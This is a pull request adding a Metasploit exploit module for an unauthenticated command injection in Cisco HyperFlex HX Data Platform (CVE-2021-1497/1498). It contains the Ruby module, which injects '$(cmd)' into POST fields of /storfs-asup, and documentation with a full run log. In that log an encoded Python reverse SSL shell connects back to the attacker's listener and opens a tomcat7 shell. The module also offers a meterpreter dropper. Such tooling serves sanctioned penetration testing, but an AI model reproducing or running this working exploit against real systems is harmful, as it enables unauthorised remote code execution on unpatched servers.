### PR TITLE
Add Cisco HyperFlex HX Data Platform CVE-2021-1497/CVE-2021-1498 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.md
@@ -1,0 +1,75 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an unauthenticated command injection in Cisco
+HyperFlex HX Data Platform's `/storfs-asup` endpoint to execute shell
+commands as the Tomcat user.
+
+### Setup
+
+Import `Cisco-HX-Data-Platform-Installer-v4.0.2d-35606-esx.ova`.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### Cisco HyperFlex HX Data Platform Installer 4.0(2d)
+
+```
+msf6 > use exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec
+[*] Using configured payload cmd/unix/reverse_python_ssl
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > options
+
+Module options (exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set rhosts 192.168.161.3
+rhosts => 192.168.161.3
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > set lhost 192.168.161.1
+lhost => 192.168.161.1
+msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > run
+
+[*] Started reverse SSL handler on 192.168.161.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Storfs ASUP servlet detected.
+[*] Selected cmd/unix/reverse_python_ssl (Unix Command)
+[*] Executing command: python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMTYxLjEnLDQ0NDQpKQpzPXNzbC53cmFwX3NvY2tldChzbykKc2g9RmFsc2UKd2hpbGUgbm90IHNoOgoJZGF0YT1zLnJlY3YoMTAyNCkKCWlmIGxlbihkYXRhKT09MDoKCQlzaCA9IFRydWUKCXByb2M9c3VicHJvY2Vzcy5Qb3BlbihkYXRhLHNoZWxsPVRydWUsc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSxzdGRlcnI9c3VicHJvY2Vzcy5QSVBFLHN0ZGluPXN1YnByb2Nlc3MuUElQRSkKCXN0ZG91dF92YWx1ZT1wcm9jLnN0ZG91dC5yZWFkKCkgKyBwcm9jLnN0ZGVyci5yZWFkKCkKCXMuc2VuZChzdGRvdXRfdmFsdWUpCg==')[0]))"
+[*] Command shell session 1 opened (192.168.161.1:4444 -> 192.168.161.3:58970) at 2021-06-03 00:28:24 -0500
+[!] Command execution timed out
+
+id
+uid=111(tomcat7) gid=114(tomcat7) groups=114(tomcat7),42(shadow)
+uname -a
+Linux HyperFlex-Installer-4.0.2d 4.4.0-75-generic #96-Ubuntu SMP Thu Apr 20 09:56:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
+++ b/modules/exploits/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco HyperFlex HX Data Platform Command Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection in Cisco
+          HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell
+          commands as the Tomcat user.
+        },
+        'Author' => [
+          'Nikita Abramov', # Discovery
+          'Mikhail Klyuchnikov', # Discovery
+          'wvu' # Analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer
+          ['CVE', '2021-1498'], # HyperFlex HX Data Platform
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'],
+          ['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'],
+          ['URL', 'https://twitter.com/ptswarm/status/1390300625129201664']
+        ],
+        'DisclosureDate' => '2021-05-05',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false, # Privesc left as an exercise for the reader
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => %w[GET POST].sample,
+      'uri' => normalize_uri(target_uri.path, 'storfs-asup')
+    )
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 200 &&
+           res.body.include?('Action for the servlet need be specified.')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable('Storfs ASUP servlet detected.')
+  end
+
+  def exploit
+    print_status("Selected #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Executing command: #{cmd}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'storfs-asup'),
+      'vars_post' => {
+        'action' => Faker::Hacker.verb,
+        %w[token mode].sample => "$(#{cmd})"
+      }
+    }, datastore['CmdExecTimeout'])
+
+    unless res
+      print_warning('Command execution timed out')
+      return
+    end
+
+    unless res.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to execute command')
+    end
+
+    print_good('Successfully executed command')
+  end
+
+end


### PR DESCRIPTION
```
msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) > info

       Name: Cisco HyperFlex HX Data Platform Command Execution
     Module: exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-05-05

Provided by:
  Nikita Abramov
  Mikhail Klyuchnikov
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated command injection in Cisco
  HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell
  commands as the Tomcat user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-1497
  https://nvd.nist.gov/vuln/detail/CVE-2021-1498
  https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR
  https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c
  https://twitter.com/ptswarm/status/1390300625129201664

msf6 exploit(linux/http/cisco_hyperflex_hx_data_platform_cmd_exec) >
```